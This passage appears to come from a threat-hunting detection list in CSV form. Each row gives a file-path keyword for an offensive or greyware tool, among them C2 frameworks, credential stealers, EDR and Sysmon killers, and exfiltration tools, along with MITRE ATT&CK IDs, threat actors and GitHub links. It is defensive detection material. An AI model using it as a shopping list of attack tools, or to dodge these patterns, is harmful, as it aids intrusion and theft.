+"*\ScriptSentry.psm1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*\ScriptSentry.txt*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z"
+"*\scuffy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\Seatbelt.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\Seatbelt\Commands\*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool 
that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z"
+"*\ServerC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\ServerC2.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\ServerC2\ServerC2.*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\servers\dns_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*\servers\icmp_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 
- T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*\servers\smb_server.py*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*\SessionSearcher.csproj*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\SessionSearcher.exe*","offensive_tool_keyword","SessionSearcher","Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details","T1552.004 - T1083 - T1114.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/matterpreter/OffensiveCSharp/tree/master/SessionSearcher","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*\shadowcoerce.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*\shadowcoerce.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\ShadowSpray\*.cs*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z"
+"*\Sharefinder.ps1*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\SharpAzbelt.csproj*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
+"*\SharpAzbelt.exe*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
+"*\SharpAzbelt.sln*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","0","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z"
+"*\SharpC2*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*\SharpDomainSpraty\*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*\SharpDoor.cs*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z"
+"*\SharpEfsPotato*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z"
+"*\SharpExfiltrate\*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z"
+"*\SharpGmailC2*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z"
+"*\SharpHoundCommon\*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z"
+"*\SharpMove.exe*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*\SharpNoPSExec*","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for lateral movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","0","N/A","10","6","567","85","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z"
+"*\SharpRDPHijack*","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/bohops/SharpRDPHijack","1","0","N/A","10","4","382","84","2021-07-25T17:36:01Z","2020-07-06T02:59:46Z"
+"*\SharpSpray.exe*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z"
+"*\SharpTerminator.csproj*","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","3","266","53","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z"
+"*\SharPyShell*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
+"*\shellcode_loader.dll*","offensive_tool_keyword","GadgetToJScript","A tool for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.","T1059.001 - T1078 - T1059.005","TA0002 - TA0004 - TA0001","N/A","N/A","Exploitation tools","https://github.com/med0x2e/GadgetToJScript","1","0","N/A","10","8","777","157","2021-07-26T17:35:40Z","2019-10-05T12:27:19Z"
+"*\shellcode_samples\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\sherlock.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
+"*\Shhmon.*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z"
+"*\Siber Systems\GoodSync\*","greyware_tool_keyword","Goodsync","GoodSync is a backup and file synchronization program abused by attacker for data exfiltration","T1567.002 - T1020 - T1039","TA0010 ","N/A","N/A","Data Exfiltration","https://www.goodsync.com/","1","0","N/A","9","10","N/A","N/A","N/A","N/A"
+"*\SigFlip.exe*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*\sigthief.exe*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. 
Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z"
+"*\SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z"
+"*\SilentProcessExit.sln*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*\SillyRAT\*.py","offensive_tool_keyword","venom","venom - C2 shellcode 
generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\SimpleLoader.cpp*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*\SimpleLoader.exe*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*\sitadel.log*","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","516","111","2020-01-21T14:59:40Z","2018-01-17T09:06:24Z"
+"*\slinky.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\SMB_RPC\*.py","offensive_tool_keyword","impacket","Impacket is a 
collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*\smuggler.py*","offensive_tool_keyword","smuggler.py","HTML Smuggling Generator","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/smuggler.py","1","0","N/A","9","3","229","42","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z"
+"*\sniff.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*\SoftPerfect Network Scanner*","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Network Exploitation tools","https://www.softperfect.com/products/networkscanner/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" +"*\spacerunner.exe*","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*\spellbound-main*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*\spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. 
","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*\spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z"
+"*\spider_plus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\SpoofCmdLine\TheThing*","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z"
+"*\spooler.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\SprayAD.cna*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z"
+"*\SprayAD.exe*","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z"
+"*\SQLInfoDumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*\SQLRecon*","offensive_tool_keyword","SQLRecon","A 
C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","0","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z"
+"*\stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z"
+"*\start_campaign.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*\StayKit.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","0","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
+"*\StolenPasswords.txt*","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z"
+"*\Suborner.sln*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","0","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z"
